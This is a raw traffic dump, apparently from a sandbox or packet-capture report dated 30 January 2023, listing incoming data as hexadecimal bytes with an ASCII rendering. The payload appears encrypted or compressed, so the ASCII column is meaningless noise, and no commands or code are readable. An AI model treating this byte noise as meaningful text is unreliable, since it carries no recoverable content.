                                                                          2023-01-30 12:39:17 UTC336INData Raw: a6 cd 21 9b 55 8c 32 51 4c 28 96 87 cb ec a8 42 d0 08 67 51 f5 ca f8 76 62 7a 93 0c 02 c5 11 cf 60 82 b5 1f 52 8a 58 43 cd 66 67 ed 38 a9 0c 43 a0 83 7b ca 39 07 5f 2f a9 4c e8 de f7 1e 22 87 76 22 b7 b8 8c 5b 17 3b 2e e9 ad 29 08 54 51 e2 8a b3 65 f4 04 76 fe 6e 05 68 0e f9 1e eb a1 da 92 ce 29 9a 9b 7a 7a f8 1c 81 3e da 68 46 64 fe 41 c2 f0 04 51 28 ab 96 b7 30 8d 09 77 06 4c cf 4f 74 41 63 69 1e 92 2c 58 e8 ce ca 19 12 9a 9d e8 9e b2 49 7a 1d ef 69 78 d6 10 4b 72 4a 74 14 92 af ac 05 7d c1 54 42 bb a4 51 c7 ed bc 40 37 97 44 33 13 88 bf 1e 5e 59 58 70 62 a4 5d 9a c1 1f ff 65 71 79 bf 0f eb aa 19 16 90 74 5c 9a c8 94 88 3d 7f 26 db 87 be af 1d a8 49 8c 24 b5 a4 c1 23 bc 02 88 ef 28 6d 4f c5 c1 1c de 2b 35 2b 76 51 00 95 e2 c7 5d 2c 5b 95 33 b8 00 96 a5
                                                                          Data Ascii: !U2QL(BgQvbz`RXCfg8C{9_/L"v"[;.)TQevnh)zz>hFdAQ(0wLOtAci,XIzixKrJt}TBQ@7D3^YXpb]eqyt\=&I$#(mO+5+vQ],[3
                                                                          2023-01-30 12:39:17 UTC344INData Raw: 74 98 c2 76 c0 26 fb 53 30 db e8 02 9a 55 19 99 d6 0f c2 b0 ef 6c 66 4c 34 53 75 50 ea c4 a2 3d a7 99 84 de c0 78 b4 c8 8e fb 5d 8d 11 a0 74 3d b9 19 39 95 2f f2 38 1a d1 b7 85 41 0c 80 27 dd e8 33 41 a0 12 e9 43 cc 44 d4 b7 a1 55 9c 39 a5 41 91 fc 96 5c 70 bd 60 e4 0c 1b ab bb 39 d0 07 62 df d1 03 25 16 ea 2f f9 83 49 9a 40 34 67 3b 82 2c fe 46 73 eb 3b a4 30 7e b4 99 6d b3 4a 5c c9 2d ad e8 cf e8 d7 72 6d e3 f9 26 c5 42 00 bc d1 2b b9 ee d5 ac 43 55 71 b5 24 3d e8 8a 8e 54 be c4 b6 60 11 38 bb b4 af 38 b0 06 5b c9 03 89 c0 2b 55 69 e9 e4 07 64 4e e3 27 ee d7 da 1a 39 72 4c 6e f9 6f 3d 66 ed d7 3a 5e 3a 04 f2 8f 8a ec 31 bb ee b4 31 eb 79 25 15 40 d7 9f 35 c1 0d 80 dc e1 86 68 a3 dd 08 f2 e3 fb 68 6e a3 5c ca df c3 d4 3f 25 c1 6b 27 ce 72 53 bc f9 3a 11
                                                                          Data Ascii: tv&S0UlfL4SuP=x]t=9/8A'3ACDU9A\p`9b%/I@4g;,Fs;0~mJ\-rm&B+CUq$=T`88[+UidN'9rLno=f:^:11y%@5hhn\?%k'rS:
                                                                          2023-01-30 12:39:17 UTC352INData Raw: 4c 3d a2 3b 7d 8b b4 80 6b 39 97 5d 30 e0 5b 20 86 8b 97 0b b9 6f 04 3d 43 19 61 eb b3 54 e4 0e d2 f4 4c 80 18 6f ee 5b 7b 69 27 6e 92 a3 b2 57 01 30 98 f4 b0 13 c3 46 97 b8 43 2f de 09 b5 b1 aa 6e 5d 53 56 54 ab 0d cd 20 df 85 c7 78 25 ee 99 c5 ef 57 6e 1b 42 2d 03 48 75 59 00 1e 51 4e 70 8e 40 16 5e 07 5f a7 53 12 df c1 0d 99 a5 d5 9d 0c f5 74 52 6a 51 c1 56 ef eb bf a9 ee f3 dc 64 fe 20 d2 18 49 cc df 8b 8f 60 99 40 50 37 0a 93 f9 16 83 98 8c 12 3b fc 21 7b 50 d7 cd 2f 7a a7 2a ba ad b7 ef a6 07 18 e9 94 36 dd 73 a1 73 59 4d b5 5a bd bf 33 90 fd 45 32 58 73 db c1 a0 b9 ba a7 a1 6c d7 16 6d 24 7a 56 b6 41 f7 8e 6b 22 6b c8 2c a8 ef c8 6a c1 a6 0e 03 43 8a a1 1e d1 ad e8 fd 63 e5 9c fa 66 e8 d3 32 d6 9c c5 41 40 2d a6 0a d2 57 af fd 8b 17 c2 05 f1 b9 a8
                                                                          Data Ascii: L=;}k9]0[ o=CaTLo[{i'nW0FC/n]SVT x%WnB-HuYQNp@^_StRjQVd I`@P7;!{P/z*6ssYMZ3E2Xslm$zVAk"k,jCcf2A@-W
                                                                          2023-01-30 12:39:17 UTC359INData Raw: 09 fc 02 52 87 8d e6 a2 7b 9c 68 bd fa 86 dd a2 3d 6e 7d 39 62 87 82 47 52 59 89 c7 89 c2 5b 76 08 3c 3a a3 f1 3b 6b 66 6d 42 98 46 de 27 e4 e2 df f5 8e 69 cc 70 97 ac 38 af 7d 3b 71 f7 85 07 09 97 82 55 b8 43 88 9e 13 e4 59 1d fe a8 ef 2e b5 ac b9 75 32 f2 78 84 4d 11 76 5d db f7 99 aa 51 47 11 f6 40 c5 81 30 e3 d9 24 dc 38 28 bb be a8 9a 53 46 ab a1 79 34 1d 05 3c 4a 0b 3b 7e 3d 8e 09 9c 34 4c 24 85 ec fc 94 6a bb fc 19 fd 9b c7 24 4c 67 b6 85 6a 83 ef 98 cc ab 11 fe 33 bc ef 1c 36 91 d4 ea 00 a6 ff 06 7d 85 c6 c5 84 0c d9 00 f4 16 24 12 1a 3a a9 e1 dc fb c2 f8 53 2f 18 e4 15 63 e8 fd c7 3c c9 e8 a3 e0 55 52 cb 25 a2 3a b9 3b 86 17 c8 ef 44 ad 0f 09 db 01 6e 04 1a ec 9d 81 35 56 33 55 4e db f9 be 46 51 10 f8 2f 78 58 f2 f0 cb 00 cf 0d 83 6d 22 ca 34 52
                                                                          Data Ascii: R{h=n}9bGRY[v<:;kfmBF'ip8};qUCY.u2xMv]QG@0$8(SFy4<J;~=4L$j$Lgj36}$:S/c<UR%:;Dn5V3UNFQ/xXm"4R
                                                                          2023-01-30 12:39:17 UTC367INData Raw: ff 47 cb a6 6d 54 1a dd f8 b2 f2 59 9d 4c b8 56 49 df 96 3d 9b 7e 61 9b 63 0d 4b b5 78 60 17 99 3c a0 e3 97 2b 26 3e 3f 6b a3 6a ac 8d d1 e7 38 0b e4 8b c9 bd 82 01 4d 38 dd a7 f6 7a e1 cc b2 a7 ec 9d da ff 64 59 36 9b 71 61 f8 df 94 8a c4 68 ee fe 64 25 b7 3e 0a e0 ba f0 fd 13 61 2a 41 f2 e8 8b 3d bc 6b e1 c1 03 e8 d4 75 e9 7a 5e a7 d2 d1 c7 71 47 58 3e f7 50 31 7e 70 e2 9a cd 87 49 4b d5 37 ee 37 90 0f 3d f8 d8 0d 82 78 0c 7b 2b f5 55 56 30 47 42 4c 7c 26 a1 1a f9 b2 92 fe 8e 95 49 8d 64 a3 8d cb 36 2e 3c ef 01 e2 5f f1 bd f4 3b 1f 91 39 bf 6e b3 9b 7a 13 ea 88 d9 23 71 8d 8f c1 95 fe 31 79 4e 11 a6 f4 f7 c8 e1 91 65 42 68 cd 80 67 fe a4 8a 67 e2 ff 2b 44 76 e6 84 df 2c 48 c5 63 d7 50 eb 2a 70 f0 da 63 13 02 f4 78 b2 a8 a0 7d 6a 83 3b 06 05 eb 7e 80 f1
                                                                          Data Ascii: GmTYLVI=~acKx`<+&>?kj8M8zdY6qahd%>a*A=kuz^qGX>P1~pIK77=x{+UV0GBL|&Id6.<_;9nz#q1yNeBhgg+Dv,HcP*pcx}j;~
                                                                          2023-01-30 12:39:17 UTC375INData Raw: 68 9e a1 dc 56 b1 c7 25 5f f6 c6 5d b5 e9 05 00 d8 ad 04 fa 86 3a 14 87 ca 7f 22 11 30 5c b0 cd 37 2c 14 69 4c 84 bd 6c 86 8a f3 e3 68 f0 b5 b4 ee 36 40 54 95 2e 17 1d b2 b6 0b 8b 85 1b c5 c7 39 15 67 3c cb d9 23 74 e2 f3 c9 fc 26 84 aa 95 de 44 cf 0c 28 7a 55 37 cc cf b7 94 2e e5 60 80 d1 0e 1f f3 4f dc 1e 25 da 88 c9 f4 4b 5b ec 2c 1b b4 8a 5c cd 0f 5f 25 f3 69 3c 16 ff a3 fd 0b 11 66 a0 08 74 8d 1a 84 ed 33 65 5b 0f 1f 31 71 29 87 db 99 9b c8 95 74 e9 69 0f 35 4a e1 77 e8 4d 31 70 bf f4 09 75 01 67 35 65 68 ed 9d 79 66 e9 2a 4c ed 63 10 3f ea 0c af 2d 87 aa 2f 2a ef 8d a4 d7 32 a9 38 53 a4 19 db aa 06 54 96 9e 1a cb 18 f8 be d6 bf a6 4f cd 3d 07 a1 e2 13 c0 3e ee f0 f5 a4 f3 af db d7 94 9e 8c e2 14 17 f9 37 db 01 a8 f4 32 35 14 61 d0 e5 c9 71 00 11 6e
                                                                          Data Ascii: hV%_]:"0\7,iLlh6@T.9g<#t&D(zU7.`O%K[,\_%i<ft3e[1q)ti5JwM1pug5ehyf*Lc?-/*28STO=>725aqn
                                                                          2023-01-30 12:39:17 UTC383INData Raw: ce 08 e9 27 31 c1 0a 31 73 17 d5 74 11 94 23 25 e2 25 0f 88 9c 80 4f fc 66 a3 8a a1 81 27 e1 89 6c 49 22 7b 00 c7 03 54 0a 3a 60 88 44 3f 91 45 ac 1d a9 fa 1b 17 e5 9d 59 1f d4 82 73 85 98 ce b8 f8 cf a2 bb 94 47 95 1a 37 e4 4c 2d ee 57 8d 6b c3 c3 91 17 08 3f 18 ec a3 12 06 a5 fe 68 d9 fd 5c 2b d9 30 4f 76 d2 94 eb 01 96 82 48 ed 3d 56 ad 5f 50 b0 19 fe bd 3e 30 37 a8 83 84 50 1d b4 c3 a7 aa 77 5f 19 2a 5d ba 6b 68 5d c6 b9 64 21 dd 75 b5 90 e0 e3 1f fa 8b 46 11 6f 5a a9 d4 d2 4c 24 e5 03 d3 9e 59 8f bf 73 1d cf f3 e0 42 89 ab 33 24 0a 95 65 4f a7 4d d9 20 59 65 a5 08 0c f1 17 6c 86 bd 4b 65 69 d8 7a 43 6c 5f d7 b5 09 4d 75 32 b3 8d ad a9 fa ef 28 01 59 f4 9a 92 c7 1d 74 6f 03 5b dd 3d 72 b4 e6 fa e1 32 5a c9 99 90 ce 55 05 5b 23 6b 92 04 bb 2e 85 8d d2
                                                                          Data Ascii: '11st#%%Of'lI"{T:`D?EYsG7L-Wk?h\+0OvH=V_P>07Pw_*]kh]d!uFoZL$YsB3$eOM YelKeizCl_Mu2(Yto[=r2ZU[#k.
                                                                          2023-01-30 12:39:17 UTC391INData Raw: 2a 73 16 c4 48 ad 6a fe b8 8d a0 51 b4 10 dd e0 d4 64 6a ce 54 0b c6 b4 97 fd 87 c5 a6 3a b3 96 f0 1f fa 54 6a 9b a2 0a e7 fd f7 e7 a2 37 9f 29 d3 37 ad fb f7 25 79 a8 7a 12 70 fa 6e 11 5f 20 d6 0a 4a f8 a9 be 51 9a 79 85 70 ad 30 3a c6 b8 94 4d bc 20 5e b5 a4 c7 ec 71 69 b3 14 cc 37 75 33 53 d0 97 fc 0b 6f f7 b5 48 7c 9c 71 15 6a 32 f1 77 58 80 d2 e6 e9 4c e6 17 c9 34 d3 80 47 c0 51 b5 96 b2 ae 3f 58 ac ea 98 15 03 1e 20 f6 c9 60 4f 94 7c 6d 50 e2 0d 41 26 91 ee 90 02 fa 05 5a 35 a8 d7 69 a4 09 45 33 a3 09 67 0b 47 78 4c ad c9 dd db e0 f5 8a f2 98 4f 1c 6f f6 82 02 0a 50 72 c5 99 1b 21 61 de c8 32 a8 a6 b0 3a 81 1f a1 9f c5 ea 25 6c 8d b8 4e 96 7a 5d 46 0b fe 88 b9 96 4e 0c b5 f1 00 af af 94 72 36 a5 d7 3a 7b f1 9f 00 f4 d4 fd 81 49 ca 77 67 d9 79 0a 2a
                                                                          Data Ascii: *sHjQdjT:Tj7)7%yzpn_ JQyp0:M ^qi7u3SoH|qj2wXL4GQ?X `O|mPA&Z5iE3gGxLOoPr!a2:%lNz]FNr6:{Iwgy*
                                                                          2023-01-30 12:39:17 UTC398INData Raw: e7 f9 a5 c9 2f b0 f2 7c 87 1d 8c d6 ea 58 ee 83 3b f7 bb 51 c4 1f 0b ff 23 13 59 b4 a2 d4 68 4d c0 b8 4c fd ec 80 0b eb 90 47 e0 7e c0 bd 9a ee e3 41 ea c4 3c ef 11 a6 95 ea ff 9f 5c 3b 81 2a 0e ed 9d cc 8b c8 23 e5 25 9d 63 62 81 7d 0a fd 4f 2d 96 fe 46 9b ba 5e dd 6c db 91 89 d2 57 81 9c 44 5b 3c ab c3 c8 08 b2 b4 78 ba f7 f5 51 41 8f 2a 93 86 b4 61 ec 67 31 b9 b6 c4 ed 5f bf 3a 69 ad 61 ee 95 79 17 e9 32 01 93 48 3e ad a2 ae 74 16 f8 f1 fd 35 2a d3 43 0f 67 f3 8b f8 98 14 61 d7 7f 23 ae 44 56 e8 0d 62 0e b8 1a 3f 35 b7 12 39 e6 0e 9e af b6 be 49 62 b9 25 b7 d0 00 f7 83 13 b6 59 31 f4 4e 8c 6d c5 26 ae d4 c0 b1 39 cc 26 8b 4b ff c7 0f 5b 56 e6 55 3e 03 70 97 87 d9 76 1a ac 48 95 1c b8 2a 76 a9 b0 06 9c 0e d8 c1 13 8c 24 ad 6e fb f2 d3 75 97 36 33 60 4a
                                                                          Data Ascii: /|X;Q#YhMLG~A<\;*#%cb}O-F^lWD[<xQA*ag1_:iay2H>t5*Cga#DVb?59Ib%Y1Nm&9&K[VU>pvH*v$nu63`J
                                                                          2023-01-30 12:39:17 UTC406INData Raw: e7 81 cb 7f 70 1f 14 2f c2 50 97 db 26 20 ee 35 0b 9d 23 98 03 5a bf da 84 ff 98 97 d6 e1 b0 04 4a ba f2 eb 2d 11 b5 6a 1b 8b 76 2d 5a 9e 2e 88 da 94 3b ff 64 0c b4 12 f3 fb 74 5a d1 bc 9f c3 3d b0 80 c0 34 e1 5e 88 69 6d 37 f5 f4 ef e8 d6 79 5b 0c 33 40 86 61 66 6e e5 76 f2 d7 32 d4 c4 f9 cf 39 3d 5e 3b 47 69 c0 f4 ed 0c 93 e1 0b 1b c2 58 b0 b8 e0 a0 2d ac 9e 3c 9c 87 16 1d 3b b3 51 96 b0 6c 8e fe 07 97 88 ed e2 b1 4c 27 11 a4 61 b3 3f c2 c8 6f 67 85 5b b2 e4 4d f5 57 39 d3 57 d7 d5 27 ca a2 64 30 46 8b 05 c3 5e 8c 4f 4c aa c4 52 39 8e 3c 89 57 fb 36 ae bf 13 85 c2 a7 4d ae 6d 99 b5 c6 4f e7 2e ff e5 df 60 9c 28 a7 55 38 fd a9 a8 8b ca 62 64 4d 55 2e a0 53 89 78 b9 df 80 17 a3 bc 11 de 57 7e e1 d0 5e 9b d5 f2 3d c3 1b 6a af 18 09 67 66 8e 73 e1 2d c2 09
                                                                          Data Ascii: p/P& 5#ZJ-jv-Z.;dtZ=4^im7y[3@afnv29=^;GiX-<;QlL'a?og[MW9W'd0F^OLR9<W6MmO.`(U8bdMU.SxW~^=jgfs-
                                                                          2023-01-30 12:39:17 UTC414INData Raw: 73 4a ab 6e b7 6f d2 65 3f d7 e9 c4 63 be 2d fd 2e 5c d1 87 cc e1 a8 3d c4 00 f1 fd af 8d 20 75 72 74 94 e0 22 11 43 52 a7 d8 3c 3e 78 e2 be 72 87 7e c8 45 36 85 c7 74 d9 f6 1d 4a dc ef 5f 68 8d 46 96 61 e1 da 01 99 51 e2 2c 00 6a f8 00 b1 cd d1 47 81 64 5c a6 f6 a6 87 9c 97 00 24 18 62 56 e9 25 5a 68 d9 eb a6 d5 5d 4a 36 99 f3 14 63 73 92 39 aa a7 51 4d ed f7 da bd f5 dc 2c 48 11 74 d5 97 02 15 01 5c 3c b1 33 a7 94 02 d4 b4 88 14 e5 81 6c 63 db 5c 74 ca b3 da d5 07 8f 73 d2 f3 80 cc b1 1d ee 3b c8 0f 9e e1 cd 69 ca a0 9e 72 eb 30 5f 94 19 f8 50 cb e4 78 32 5a 66 c5 a4 2a 2a 50 76 93 78 8a 23 2d 55 f3 5a 48 47 ee e0 d7 28 36 0f fc fb ae ba cd ac ea f9 94 46 73 ab 3e 8a ca c4 95 2d af 86 eb b8 87 2a e4 8b dd 85 45 89 fe 30 44 f0 85 c5 69 8d fa bd f7 a2 f5
                                                                          Data Ascii: sJnoe?c-.\= urt"CR<>xr~E6tJ_hFaQ,jGd\$bV%Zh]J6cs9QM,Ht\<3lc\ts;ir0_Px2Zf**Pvx#-UZHG(6Fs>-*E0Di
                                                                          2023-01-30 12:39:17 UTC422INData Raw: 30 68 e0 a7 be ff e0 2a 9e 47 89 41 f7 ef 90 19 99 94 20 34 7b 3e dc 41 1c fb a5 c4 b1 87 ee 49 23 65 89 4f 10 61 19 45 61 ac e4 90 7e d0 68 92 34 4c 0d f0 95 37 e1 24 bb d9 50 f0 dd 93 72 3b e3 46 61 4c c2 96 0b b1 f1 35 10 a4 aa 93 8e 2d d4 93 1e a8 f3 03 1c 71 42 1a 5e ba d5 88 0d 67 f1 d6 79 e0 70 a1 d8 fb 35 2c 39 7a ce 09 98 09 5e 67 8b 96 c9 13 94 9a b5 22 f0 68 1c b8 27 50 2f 22 5b 8d 7b c6 5a 24 33 22 fc a3 24 db 4b 92 e2 fd d7 1c 91 19 bc 33 27 43 28 d4 c8 0c 51 f8 c7 1a 94 9c 65 5b 98 fd 1e 4a 06 dd f4 c8 ea 34 3e 46 2d 8b f3 a2 b5 56 a2 6c 57 4a cc 51 04 0a f4 73 7f 34 6b fa 9a cc 6c 9f f2 d2 0c a0 7d ba 17 dc fe 68 18 91 0d 24 e5 41 b3 ef 41 4c 78 ed 58 3f 44 33 9f 25 f6 47 9b 7a 9d 8d 9d 8a 77 42 f4 e8 c6 3e 81 f7 42 10 0f eb bf 6c 54 ee ce
                                                                          Data Ascii: 0h*GA 4{>AI#eOaEa~h4L7$Pr;FaL5-qB^gyp5,9z^g"h'P/"[{Z$3"$K3'C(Qe[J4>F-VlWJQs4kl}h$AALxX?D3%GzwB>BlT
                                                                          2023-01-30 12:39:17 UTC430INData Raw: 20 fa 39 29 6c d6 86 e2 ab a1 b7 fb 5d 8e 88 b5 85 50 c6 e0 7f df ab 69 96 09 16 2f 0f d9 75 5c 52 01 fd bb 14 44 95 15 0d 01 62 08 f1 f6 49 62 c9 80 bd 87 2d ae 26 b5 be c1 b4 6e 42 a8 86 45 b4 c8 20 26 83 96 ca 84 ee 40 8a 69 48 c6 b4 50 7d 69 76 a2 fc d0 a9 8b 88 91 29 e5 e3 2a 71 ca 00 50 70 79 12 2b e6 7c a5 94 53 13 66 ac e2 f5 23 a8 0e 2b 5f c8 a3 51 99 fc 6c 9f 34 32 10 3b 27 96 e2 fa bb ff 4c de ae e0 12 c1 f5 44 d9 ea cb 58 8b 5f b1 4a 43 be f8 d6 1e a8 2a 6e 2f 8c ae 3b 77 ec 0d 4e 00 d4 4e 9b b1 fd 78 9b e7 87 7c 61 3b a7 38 6a 1f 50 3f 6d ac 7d 8f d9 19 6b 2e b0 f7 26 d6 31 e7 16 d7 9e 47 73 d6 b9 ac cf d4 a3 e6 f5 ff 3d c9 a0 dc e4 7a 31 7a 8e ee 0d 4f 96 50 50 e5 1d 74 3c 51 63 b9 6e 95 ca 37 a8 e7 d4 ad e2 6c 0d f1 dd 73 10 48 b1 53 9d c1
                                                                          Data Ascii: 9)l]Pi/u\RDbIb-&nBE &@iHP}iv)*qPpy+|Sf#+_Ql42;'LDX_JC*n/;wNNx|a;8jP?m}k.&1Gs=z1zOPPt<Qcn7lsHS
                                                                          2023-01-30 12:39:17 UTC438INData Raw: b7 bf 95 1f 65 1f 4c 4f 2d f2 b9 94 67 94 8e 4f 7d 70 6b 5b 0c 40 b0 65 db 76 1a af 7e 3a 43 12 d1 3b 94 47 37 a5 b3 ab 81 21 fd 0b b9 b3 47 6d 8a 24 be 36 76 64 96 a9 23 27 f9 0c d2 63 c6 cd 73 18 6c 65 dd 8e ee 28 f9 c0 51 a8 e8 bd c6 90 1a 5a 33 45 2f 20 b1 74 d6 f7 1a 47 2c f1 02 ec d0 7d 67 7b 0d 0b f8 04 49 f6 af 3b a8 2d 56 fd 04 50 80 83 61 8e 2d 33 2a 06 67 d8 99 9f 43 a0 59 2d 8b 9f 34 a1 c9 64 03 2d 26 3f 4c b1 7f 80 63 ac 8c a4 0d 34 65 cd 68 1f 59 3b e7 e9 6b 27 cc 4a 83 15 6c 63 df b1 66 98 88 dd cb 1e 6c 38 9c 14 b6 24 33 5e d9 d0 3f 29 91 17 2a 7b 6f 59 75 fc 33 14 16 b7 86 5e 15 64 0e 31 74 a5 fc d1 72 d1 ba b6 27 8b 74 a9 ab 13 54 d2 d3 3b 02 81 41 27 b2 41 fa f1 f5 ad 18 71 fe 9e c9 86 6f 58 77 f1 39 a0 40 d9 9b 7f 09 bf dc c0 39 47 4f
                                                                          Data Ascii: eLO-gO}pk[@ev~:C;G7!Gm$6vd#'csle(QZ3E/ tG,}g{I;-VPa-3*gCY-4d-&?Lc4ehY;k'Jlcfl8$3^?)*{oYu3^d1tr'tT;A'AqoXw9@9GO
                                                                          2023-01-30 12:39:17 UTC445INData Raw: ad 06 e6 9a 7e 1e fe a0 c5 2b 9b 8c 36 e1 7c 9f 92 bf 3e 50 18 d7 7b ed cb 0d 60 97 ed 2d e3 30 db 36 e2 32 6b e6 c1 ee c2 41 a2 24 84 5d 07 c2 23 53 e4 e9 60 7a 53 a2 88 6d b0 7d 80 1f 97 ec db 31 21 60 30 2b cc 84 97 5b 57 66 04 a7 b5 5f 6f bb 49 df 92 02 70 31 6b b2 b9 73 93 fd 40 70 fb 4c 5f 8e 65 14 bb 0c 77 ef e7 31 d9 08 b8 ff 47 13 b6 e7 a7 01 c2 f4 b2 96 be 50 8b 63 b9 d3 53 10 85 eb bb 5c 2f 1d 92 e4 51 34 f7 28 e6 51 bd 67 6d c6 f8 a6 e5 c2 28 69 d6 f9 8c 42 5f 17 ca 8e ec d2 bc 77 32 b7 c3 82 e4 a6 ff 1c 5d e2 e5 7c 18 57 50 42 23 5f b8 c3 63 38 ec 3b c6 8f 1f 34 59 ae d9 a1 69 56 b3 36 02 7f dd 8b 64 b1 73 d1 67 b7 ee b7 76 3f 75 b8 4c 01 9a 73 e1 68 64 fe 28 fa 74 85 8b 23 fd 8e a1 23 18 13 70 8c cb 48 46 14 50 d6 d6 e7 c0 ba 8b 9e 9c bf 4e
                                                                          Data Ascii: ~+6|>P{`-062kA$]#S`zSm}1!`0+[Wf_oIp1ks@pL_ew1GPcS\/Q4(Qgm(iB_w2]|WPB#_c8;4YiV6dsgv?uLshd(t##pHFPN
                                                                          2023-01-30 12:39:17 UTC453INData Raw: 32 38 15 cd a3 c7 9b 50 e6 e6 f2 8d 57 8a 6c 2b cc 64 0b f5 c8 98 23 d7 1f a2 20 74 0c c6 c3 4b 5f ee d9 e4 0c 58 4f ad 86 a5 2b df 87 47 85 8d 3d a7 a7 48 ae 3c 2b b2 30 a3 e2 59 ef 50 e8 19 4d 2c 3e b1 a3 70 ea 16 5f 95 c7 06 17 34 22 45 91 cd f5 49 57 e8 d2 be d1 e3 02 3b 89 26 9b 8c 23 f9 59 ed b3 1d 3f 9f 2b 55 d8 c6 ca 3b 08 36 44 68 c2 12 73 6c b5 77 e5 a3 f8 d0 20 64 e5 aa af b7 a7 38 96 05 7f fc 15 3f 19 3a b0 6a ea 20 61 96 ee 3f f8 92 a4 0c 61 93 1d c3 f7 29 e6 79 80 28 f5 ce 09 7a 1d 44 fb 82 8d ec 55 a6 69 c9 3b d5 de 63 f2 a4 87 a6 60 f8 5c 24 d7 f5 1c ee 01 f5 19 fe 39 9d a2 3b 8b f3 71 b6 7d bf 62 2c 8f 9c f8 f5 c4 50 ad 83 3d 76 71 ea 7a 8f 11 c5 5b 2d 45 c0 e1 e2 61 4f 04 3f 90 9c 16 27 cb c3 63 b9 02 b9 4d 85 49 fb cc 2b 29 31 a7 29 40
                                                                          Data Ascii: 28PWl+d# tK_XO+G=H<+0YPM,>p_4"EIW;&#Y?+U;6Dhslw d8?:j a?a)y(zDUi;c`\$9;q}b,P=vqz[-EaO?'cMI+)1)@
                                                                          2023-01-30 12:39:17 UTC461INData Raw: 23 dd 0b 3a ff cb aa a1 24 ec 04 06 77 00 ab bf ca 45 6f 41 d7 55 aa 56 c8 f4 ee e1 1b ba 21 1c f2 31 85 10 c7 d8 1d ab 71 a5 c5 be f2 b5 78 a6 aa 70 f6 fd 89 14 fa 69 95 1a 7b 88 61 be d2 3d cf 19 09 44 ab 1e 8c e8 01 2a 05 3a 9e d0 30 50 a4 61 23 0e 65 5b 97 f3 4f 9b ae 9f 77 61 a2 29 a3 28 51 56 0a c8 31 10 8c d6 d6 91 a4 e8 fc f4 51 37 f1 5b a4 20 a9 96 44 25 45 43 39 8c 93 92 c0 7c 80 f1 f3 15 6f 4c 70 d4 77 fd 22 cf 61 1c 25 00 51 92 4b d7 f8 3e 06 a3 49 62 67 e4 23 91 84 93 07 e1 a5 cb c9 50 32 8d 5f 8c 67 a9 66 f5 a3 81 44 b3 82 07 e8 52 0e c4 ba 23 c2 1e 8d 81 b5 aa b1 bb 6f 5d e7 e4 e0 27 aa a6 5c da 7e 5e 43 5c 99 8c 97 63 cd 7f 83 79 4e 55 23 96 16 05 76 5a 50 7c 46 c0 db 2a 94 98 a4 c2 63 05 9c 2c 6f b0 14 9b 6a cb 67 ef 79 cc c7 18 b4 0b 51
                                                                          Data Ascii: #:$wEoAUV!1qxpi{a=D*:0Pa#e[Owa)(QV1Q7[ D%EC9|oLpw"a%QK>Ibg#P2_gfDR#o]'\~^C\cyNU#vZP|F*c,ojgyQ
                                                                          2023-01-30 12:39:17 UTC469INData Raw: 1c df 43 ec 44 de 13 fd 91 18 f1 b7 b1 d7 95 18 b9 39 39 af 58 7f c7 5f 05 80 81 59 3d 1e 52 b5 61 ac 03 6d 9a 9e 08 98 6e 95 61 47 dc 91 17 44 c8 4d e7 59 b2 96 13 02 a9 14 ab 8c 85 16 35 e4 c0 ae c5 32 ac 47 57 96 35 82 18 cb 05 ed 0f c4 bf 6b b1 28 0c 71 ce be 99 21 ba c8 f9 d8 ca 83 49 7b 3a 8d 07 5d f4 f2 18 53 5a 2e e1 5c 43 c2 69 b4 a4 de 1f 2b 72 d1 a4 55 d9 86 b3 33 f6 5a 2c 53 65 e1 19 80 f1 a3 0c eb a6 31 02 17 5d bc 9a 6a 72 25 4a da af 32 17 b7 1e 02 33 ef 36 59 e7 85 ac f3 4c a4 e8 72 c4 1b 52 b0 1b 4f a2 99 b3 6c 89 8f 50 ab a5 b0 e9 a3 fa 4a fb 25 24 e1 93 e0 20 82 ca d7 c6 4b 21 db 7b cf ff f5 01 ec 2b 15 4f 12 d9 83 40 79 5e eb 40 dd 0c 3b f8 a0 d4 85 d8 5a 34 a3 52 8c 83 53 c2 5a 4c b1 ed e4 d1 4a 76 52 09 9f 0f a6 ea fe 58 4f 31 d1 6c
                                                                          Data Ascii: CD99X_Y=RamnaGDMY52GW5k(q!I{:]SZ.\Ci+rU3Z,Se1]jr%J236YLrROlPJ%$ K!{+O@y^@;Z4RSZLJvRXO1l
                                                                          2023-01-30 12:39:17 UTC477INData Raw: a8 f0 61 df 7e fd 0a 57 a0 52 40 7c 52 ce 9c d6 a0 c0 62 c5 11 ab 03 a0 46 01 5f 1b ed ca 23 13 64 7f b5 a6 fd 84 9e 4f 20 2f 4d a7 23 38 8d f6 16 50 f8 75 0f 97 ae 9b a8 ad bc 8d 96 c3 5c 62 36 98 58 14 f7 70 c9 87 fb b8 d9 55 1f 6e 2b d6 e7 13 cc 59 6c 9a 1e a0 2b f1 51 2c c2 ed 44 ae 10 08 9d ff 67 77 1f 44 01 db bf f7 cd 1a 1b ee f9 8b 8c 19 e6 ef 12 9c 01 db 49 6f 36 29 0d 97 bb f7 76 ad 5c cb ef 44 5a bd a3 78 86 3c e1 6f 3d f7 7a 70 f9 3b aa 5a 6c 3a da 45 af 33 7a 99 0f fe d7 22 ba 08 c6 01 4d ab e6 e4 65 e0 65 15 ef 71 31 57 61 31 14 aa 42 55 8e c9 31 ab 92 7f 17 5a ac a4 d1 6b d2 6c 28 10 8b b6 70 c7 1c da e2 c8 44 d3 e3 f4 3b ff db c9 2a 56 32 5e b5 10 80 f8 6d b3 7d de 24 c9 bf f3 6c 2e d2 3c 5c ec 8f b4 69 c6 5f 03 a1 1f e8 c1 6d f0 50 36 f4
                                                                          Data Ascii: a~WR@|RbF_#dO /M#8Pu\b6XpUn+Yl+Q,DgwDIo6)v\DZx<o=zp;Zl:E3z"Meeq1Wa1BU1Zkl(pD;*V2^m}$l.<\i_mP6
                                                                          2023-01-30 12:39:17 UTC484INData Raw: d5 f3 33 3f 0d e9 4c 57 dc ff 95 8e 29 ac 15 b2 9c 61 c6 60 41 4b ed f6 33 9d fb 2a f6 e2 82 77 e7 5f 98 70 5c 8c ab 98 51 c9 f1 e7 d6 12 08 12 b7 f1 2d d5 09 80 1e 63 de dc 9f 85 6d ab 8a 0a b3 b0 c0 54 3e 47 e0 77 57 da 19 f6 23 6d 63 54 76 01 68 f1 e5 2e e5 ba dd 0d 20 2b 95 72 d7 0d bf 7f e6 61 9c 52 bd 7b 51 03 1f c1 93 01 3e 15 21 4f 3f 3b 99 e1 34 2d 61 ee 11 cd 6d 92 09 a1 09 26 d5 ce 24 f3 dc 11 41 8c 99 cc e5 de 8c 15 21 96 b0 bf 63 5c 21 d2 25 13 54 0c 5d 20 4b bb d5 74 27 cb b4 e5 58 6d 2b 44 24 13 c2 5b 96 49 fb ce 16 95 68 6a 94 aa b1 75 95 1e 71 a2 b9 4a 3a f3 